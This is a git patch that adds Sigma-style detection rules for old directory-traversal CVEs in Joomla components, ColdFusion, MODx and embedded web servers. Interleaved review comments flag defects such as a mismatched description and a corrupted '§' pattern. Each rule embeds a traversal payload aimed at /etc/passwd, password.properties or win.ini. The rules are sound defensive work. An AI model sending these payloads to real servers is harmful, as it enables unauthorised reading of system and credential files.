+++ b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1535 exploitation attempt
+id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
+ component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml
new file mode 100644
index 00000000..564faaf9
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-1602 exploitation attempt
+id: d79bf48d-2705-4da1-929b-37e07764998f
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
+ component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/12283
+- https://www.cvedetails.com/cve/CVE-2010-1602
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml
new file mode 100644
index 00000000..447bbe51
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1657 exploitation attempt
+id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
+ 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12428
+- https://www.cvedetails.com/cve/CVE-2010-1657
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml
new file mode 100644
index 00000000..148380f1
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1718 exploitation attempt
+id: a538251c-d600-43f3-8051-c3a83a5e8702
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in archeryscores.php in the Archery
+ Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to
+ include and execute arbitrary local files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml
new file mode 100644
index 00000000..94179320
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1722 exploitation attempt
+id: 84715b18-505d-4252-9470-03c98a3006e5
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Online Market (com_market) component
+ 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12177
+- https://www.cvedetails.com/cve/CVE-2010-1722
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml
new file mode 100644
index 00000000..9bd796a5
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-1875 exploitation attempt
+id: af757e17-ad81-4a28-a551-49c17aa5113a
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Real Estate Property (com_properties)
+ component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files
+ and possibly have unspecified other impact via a .. (dot dot) in the controller
+ parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/11851
+- https://www.cvedetails.com/cve/CVE-2010-1875
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml
new file mode 100644
index 00000000..4f10cf4e
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1953 exploitation attempt
+id: 0fc4af77-6974-4e50-bf5e-9f175304eb54
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
+ component 1.0 for Joomla! allows remote attackers to read arbitrary files via a
+ .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12288
+- https://www.cvedetails.com/cve/CVE-2010-1953
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml
new file mode 100644
index 00000000..23ef2619
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1954 exploitation attempt
+id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
+ component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml
new file mode 100644
index 00000000..10d81d67
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1955 exploitation attempt
+id: 497c0911-226f-48a1-ac9f-518ffb98e65e
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
+ component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via
+ a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12238
+- https://www.cvedetails.com/cve/CVE-2010-1955
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml
new file mode 100644
index 00000000..80eb1897
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1979 exploitation attempt
+id: 5b1c3030-e17b-43b3-b95e-952355a0f43f
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
+ component build 880 for Joomla! allows remote attackers to read arbitrary files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/12088
+- https://www.cvedetails.com/cve/CVE-2010-1979
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml
new file mode 100644
index 00000000..a29bfea4
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1983 exploitation attempt
+id: c4f29c4f-0281-4518-a824-88f259d92ef5
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
+ component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
+ files via a .. (dot dot) in the view parameter to index.php
+references:
+- https://www.exploit-db.com/exploits/12055
+- https://www.cvedetails.com/cve/CVE-2010-1983
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml
new file mode 100644
index 00000000..20b4dc70
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-2033 exploitation attempt
+id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
+- https://www.cvedetails.com/cve/CVE-2010-2033
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml
new file mode 100644
index 00000000..f6c9adca
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml
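Review bot: The CVE-2010-2033 `description` names the Percha Fields Attach component (`com_perchafieldsattach`) and is word-for-word the description of the CVE-2010-2036 rule in the next hunk, but this rule's reference and its `c-uri|contains` item are about Percha Categories Tree (`com_perchacategoriestree`). An analyst triaging a hit on this rule would be pointed at the wrong component; the description should be rewritten to name the Categories Tree component the selection actually matches, in the same form as the sibling rules.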
@@ -0,0 +1,26 @@
+title: CVE-2010-2036 exploitation attempt
+id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
+ component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
+ have unspecified other impact via a .. (dot dot) in the controller parameter to
+ index.php.
+references:
+- https://www.exploit-db.com/exploits/34004
+- https://www.cvedetails.com/cve/CVE-2010-2036
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml
new file mode 100644
index 00000000..70cc525b
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-2259 exploitation attempt
+id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
+ for Joomla! allows remote attackers to include and execute arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/10946
+- https://www.cvedetails.com/cve/CVE-2010-2259
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml
new file mode 100644
index 00000000..32008b7c
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml
@@ -0,0 +1,26 @@
+title: CVE-2010-2307 exploitation attempt
+id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the web server for Motorola
+ SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
+ remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
+ (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+references:
+- https://www.securityfocus.com/bid/40550/info
+- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml
new file mode 100644
index 00000000..01e0fedc
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml
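Review bot: The selection `/../../etc/passwd` carries nothing that ties a match to the Motorola SURFBoard SBV6120E web server, so any generic traversal probe against any host raises a `critical` alert titled CVE-2010-2307; the CVE-2010-4231 rule's `/../../../../../../../../../../../../../etc/passwd` has the same problem. The description also names `//` and encoded dot-dot sequences as vectors the pattern does not cover, and a raw `/../` in the request path is often normalised by the server or proxy before it is logged, so whether it ever appears in `c-uri` depends on the log source (inferred). Either anchor the rule on a device-specific path taken from the references or retitle it as generic path traversal with a lower level so the CVE attribution is not misleading.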
@@ -0,0 +1,26 @@
+title: CVE-2010-2682 exploitation attempt
+id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
+ component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/14017
+- https://www.cvedetails.com/cve/CVE-2010-2682
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml
new file mode 100644
index 00000000..7dc8e6df
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml
@@ -0,0 +1,27 @@
+title: CVE-2010-2861 exploitation attempt
+id: 21032758-8761-4a18-8f66-bace612e2481
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the administrator console
+ in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
+ via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
+ (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
+ in CFIDE/administrator/.
+references:
+- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
+- http://www.adobe.com/support/security/bulletins/apsb10-18.html
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml
new file mode 100644
index 00000000..ad2dab17
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml
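Review bot: The detection covers only `enter.cfm` with one exact traversal depth and one target file, while the description lists five vulnerable pages under CFIDE/administrator/ that are all reached through the same `locale` parameter, so four of the five vectors and any other depth or target file are missed. Matching the directory and the parameter together with the traversal marker, `c-uri|contains|all:` with `- /CFIDE/administrator/` and `- locale=../`, keeps the ColdFusion anchor and covers every listed page. The `%00en` suffix in the current pattern is presumably how one public scanner template ends the value; whether it survives in `c-uri` depends on how the log source decodes the URI, so the rule should not depend on it.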
@@ -0,0 +1,23 @@
+title: CVE-2010-3426 exploitation attempt
+id: 06621f7e-2987-4625-8c42-d66951a9da9d
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
+ component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
+ arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml
new file mode 100644
index 00000000..5e4062f3
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-4231 exploitation attempt
+id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
+ The server is vulnerable to directory transversal attacks, allowing access to any
+ file on the camera file system.
+references:
+- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+- https://www.exploit-db.com/exploits/15505
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../../../../../../../../../../../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml
new file mode 100644
index 00000000..080cc881
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-4617 exploitation attempt
+id: ed14d2cb-8716-4ab1-a819-36d173e617ab
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
+ 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
+ traversal sequences in the section parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/15791
+- https://www.cvedetails.com/cve/CVE-2010-4617
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml
new file mode 100644
index 00000000..cf20ed0e
--- /dev/null
+++ b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml
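Review bot: The URI pattern reads `option=com_jotloader§ion=`: the `&sect` of `&section=` has been collapsed into the single character `§`, which looks like an HTML-entity conversion during copy-paste, so the rule can never match the real `&section=` query string that the description refers to. The line should read `- /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00`, or better `c-uri|contains|all:` with `- option=com_jotloader` and `- section=../` so the match does not depend on one exact traversal depth.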
@@ -0,0 +1,26 @@
+title: CVE-2010-5278 exploitation attempt
+id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
+ in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled,
+ allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key
+ parameter.
+references:
+- https://www.exploit-db.com/exploits/34788
+- https://www.cvedetails.com/cve/CVE-2010-5278
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
From e3331a4d0abbbcde76d10876a3d94ec9c3a23365 Mon Sep 17 00:00:00 2001
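Review bot: The only payload matched is the Windows `windows/win.ini%00` variant at one exact depth, so the same `class_key` traversal aimed at a non-Windows target file (`/etc/passwd`) or using a different depth goes undetected, although the description says the parameter allows reading arbitrary files. Anchoring on the script and the parameter, `c-uri|contains|all:` with `- /manager/controllers/default/resource/tvs.php` and `- class_key=../`, covers both targets without loosening the MODx-specific anchor.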
From: pbssubhash Date: Wed, 25 Aug 2021 21:40:32 +0530 Subject: [PATCH 0580/1367] Cleanup --- ...ve_CVE-2010-0943 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-0944 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1306 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1314 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1345 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1353 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1474 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1475 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1495 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1532 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1533 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1535 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1602 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1657 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1718 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1722 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1875 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1953 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1954 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1955 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1979 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1983 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-2033 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2036 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2259 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-2307 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2682 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2861 exploitation 
attempt.yaml | 27 ------------------- ...ve_CVE-2010-3426 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-4231 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-4617 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-5278 exploitation attempt.yaml | 26 ------------------ 32 files changed, 794 deletions(-) delete mode 100644 rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml delete mode 100644 
